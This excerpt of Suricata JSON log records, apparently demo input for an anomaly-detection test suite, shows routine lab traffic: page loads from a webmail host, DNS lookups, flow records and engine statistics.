{"timestamp":"2020-02-29T00:27:27.124589+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":10281},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/compose-dimp.js","state":"CLOSED","stored":false,"size":46315,"tx_id":8}} {"timestamp":"2020-02-29T00:27:27.125654+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-base.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1833},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/compose-base.js","state":"CLOSED","stored":false,"size":5941,"tx_id":9}} {"timestamp":"2020-02-29T00:27:27.165296+0000","flow_id":1537249056376372,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53186,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/prettyautocomplete.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2788}} 
{"timestamp":"2020-02-29T00:27:27.165341+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/js\/ckeditor\/ckeditor_basic.js","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2958}} {"timestamp":"2020-02-29T00:27:27.169218+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imagepoll.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":795}} {"timestamp":"2020-02-29T00:27:27.238565+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/ckeditor\/ckeditor_basic.js","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2958},"app_proto":"http","fileinfo":{"filename":"\/js\/ckeditor\/ckeditor_basic.js","state":"CLOSED","stored":false,"size":7141,"tx_id":9}} {"timestamp":"2020-02-29T00:27:27.238886+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489}} {"timestamp":"2020-02-29T00:27:27.240253+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/close.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":489},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/close.png","state":"CLOSED","stored":false,"size":489,"tx_id":10}} 
{"timestamp":"2020-02-29T00:27:27.242259+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/message_source.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119}} {"timestamp":"2020-02-29T00:27:27.243179+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/message_source.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/message_source.png","state":"CLOSED","stored":false,"size":119,"tx_id":11}} {"timestamp":"2020-02-29T00:27:27.285318+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":453}} 
{"timestamp":"2020-02-29T00:27:30.000182+0000","event_type":"stats","stats":{"uptime":15302,"capture":{"kernel_packets":142700,"kernel_drops":0},"decoder":{"pkts":142763,"bytes":98051560,"invalid":196,"ipv4":141162,"ipv6":10,"ethernet":142763,"raw":0,"null":0,"sll":0,"tcp":135557,"udp":5394,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7089568},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2932,"ssn_memcap_drop":0,"pseudo":356,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2948,"synack":2939,"rst":1225,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":149,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1934,"ftp":0,"smtp":0,"tls":789,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":108,"dcerpc_udp":0,"dns_udp":2468,"failed_udp":116},"tx":{"http":5092,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2552}},"flow_mgr":{"closed_pruned":2906,"new_pruned":17,"est_pruned":2551,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65529,"rows_empty":6,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":11550,"memcap_state":0,"memcap_global":0},"http":{"memuse":139966,"memcap":0}}} 
{"timestamp":"2020-02-29T00:27:30.000939+0000","flow_id":1547093101856505,"event_type":"flow","src_ip":"192.168.10.122","src_port":41150,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:22:29.476921+0000","end":"2020-02-29T00:22:29.588304+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:27:30.515394+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imagepoll.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":795},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/ckeditor\/imagepoll.js","state":"CLOSED","stored":false,"size":1911,"tx_id":10}} {"timestamp":"2020-02-29T00:27:30.515611+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/drafts.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":480}} 
{"timestamp":"2020-02-29T00:27:30.518621+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/drafts.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":480},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/drafts.png","state":"CLOSED","stored":false,"size":480,"tx_id":11}} {"timestamp":"2020-02-29T00:27:30.518909+0000","flow_id":897943174572797,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52021,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39633,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:27:30.546775+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":453},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/answered.png","state":"CLOSED","stored":false,"size":453,"tx_id":12}} 
{"timestamp":"2020-02-29T00:27:30.561472+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/attachment.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":545}} {"timestamp":"2020-02-29T00:27:30.627255+0000","flow_id":897943174572797,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52021,"proto":"UDP","dns":{"type":"answer","id":39633,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:27:30.627255+0000","flow_id":897943174572797,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52021,"proto":"UDP","dns":{"type":"answer","id":39633,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:27:30.690119+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/getReplyData","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":484}} 
{"timestamp":"2020-02-29T00:27:30.690119+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/getReplyData","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":484},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/getReplyData","state":"CLOSED","stored":false,"size":78,"tx_id":13}} {"timestamp":"2020-02-29T00:27:30.707466+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/getReplyData","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":484},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/getReplyData","state":"CLOSED","stored":false,"size":735,"tx_id":13}} {"timestamp":"2020-02-29T00:27:30.753180+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete-small.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":124}} {"timestamp":"2020-02-29T00:27:32.000618+0000","flow_id":2038445950622291,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"154.11.146.39","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:22:31.449107+0000","end":"2020-02-29T00:22:31.611622+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:27:32.125265+0000","flow_id":1662636331616331,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53188,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/editor.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":712},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/editor.js","state":"CLOSED","stored":false,"size":2493,"tx_id":0}} {"timestamp":"2020-02-29T00:27:32.129074+0000","flow_id":1537249056376372,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53186,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/prettyautocomplete.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2788},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/prettyautocomplete.js","state":"CLOSED","stored":false,"size":9444,"tx_id":1}} {"timestamp":"2020-02-29T00:27:33.000536+0000","flow_id":1323200751894490,"event_type":"flow","src_ip":"192.168.10.122","src_port":37972,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:22:32.557018+0000","end":"2020-02-29T00:22:32.668240+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:27:33.000913+0000","flow_id":945608701983486,"event_type":"flow","src_ip":"192.168.10.122","src_port":59959,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:22:31.998142+0000","end":"2020-02-29T00:22:32.109469+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:27:33.001064+0000","flow_id":385837024447768,"event_type":"flow","src_ip":"192.168.10.122","src_port":53767,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:22:32.888088+0000","end":"2020-02-29T00:22:32.999298+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:27:33.001283+0000","flow_id":1660149541607404,"event_type":"flow","src_ip":"192.168.10.81","src_port":53162,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":825,"bytes_toclient":648,"start":"2020-02-29T00:26:27.956396+0000","end":"2020-02-29T00:26:32.959944+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:33.001618+0000","flow_id":2245167021588029,"event_type":"flow","src_ip":"192.168.10.122","src_port":56092,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:22:32.753213+0000","end":"2020-02-29T00:22:32.864442+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:27:34.000688+0000","flow_id":467437123496173,"event_type":"flow","src_ip":"192.168.10.81","src_port":53160,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":1004,"bytes_toclient":798,"start":"2020-02-29T00:26:27.944365+0000","end":"2020-02-29T00:26:33.119119+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:35.523857+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/attachment.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":545},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/attachment.png","state":"CLOSED","stored":false,"size":545,"tx_id":12}} {"timestamp":"2020-02-29T00:27:35.714780+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete-small.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":124},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/delete-small.png","state":"CLOSED","stored":false,"size":124,"tx_id":14}} {"timestamp":"2020-02-29T00:27:36.344575+0000","flow_id":151623887766015,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49902,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":38284,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:27:36.452597+0000","flow_id":151623887766015,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49902,"proto":"UDP","dns":{"type":"answer","id":38284,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:27:36.452597+0000","flow_id":151623887766015,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49902,"proto":"UDP","dns":{"type":"answer","id":38284,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:27:36.475284+0000","flow_id":151623887766015,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49902,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":38285,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:27:36.583643+0000","flow_id":151623887766015,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49902,"proto":"UDP","dns":{"type":"answer","id":38285,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:27:36.583643+0000","flow_id":151623887766015,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49902,"proto":"UDP","dns":{"type":"answer","id":38285,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:27:37.000318+0000","event_type":"stats","stats":{"uptime":15309,"capture":{"kernel_packets":143203,"kernel_drops":0},"decoder":{"pkts":143205,"bytes":98434268,"invalid":196,"ipv4":141600,"ipv6":10,"ethernet":143205,"raw":0,"null":0,"sll":0,"tcp":135993,"udp":5396,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7089280},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2936,"ssn_memcap_drop":0,"pseudo":357,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2952,"synack":2943,"rst":1227,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":149,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1934,"ftp":0,"smtp":0,"tls":793,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":108,"dcerpc_udp":0,"dns_udp":2469,"failed_udp":116},"tx":{"http":5096,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2553}},"flow_mgr":{"closed_pruned":2908,"new_pruned":17,"est_pruned":2557,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10560,"memcap_state":0,"memcap_global":0},"http":{"memuse":880,"memcap":0}}}logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/json_logs/journal.log000066400000000000000000025216521437606560100320520ustar00rootroot00000000000000{ "__CURSOR" : 
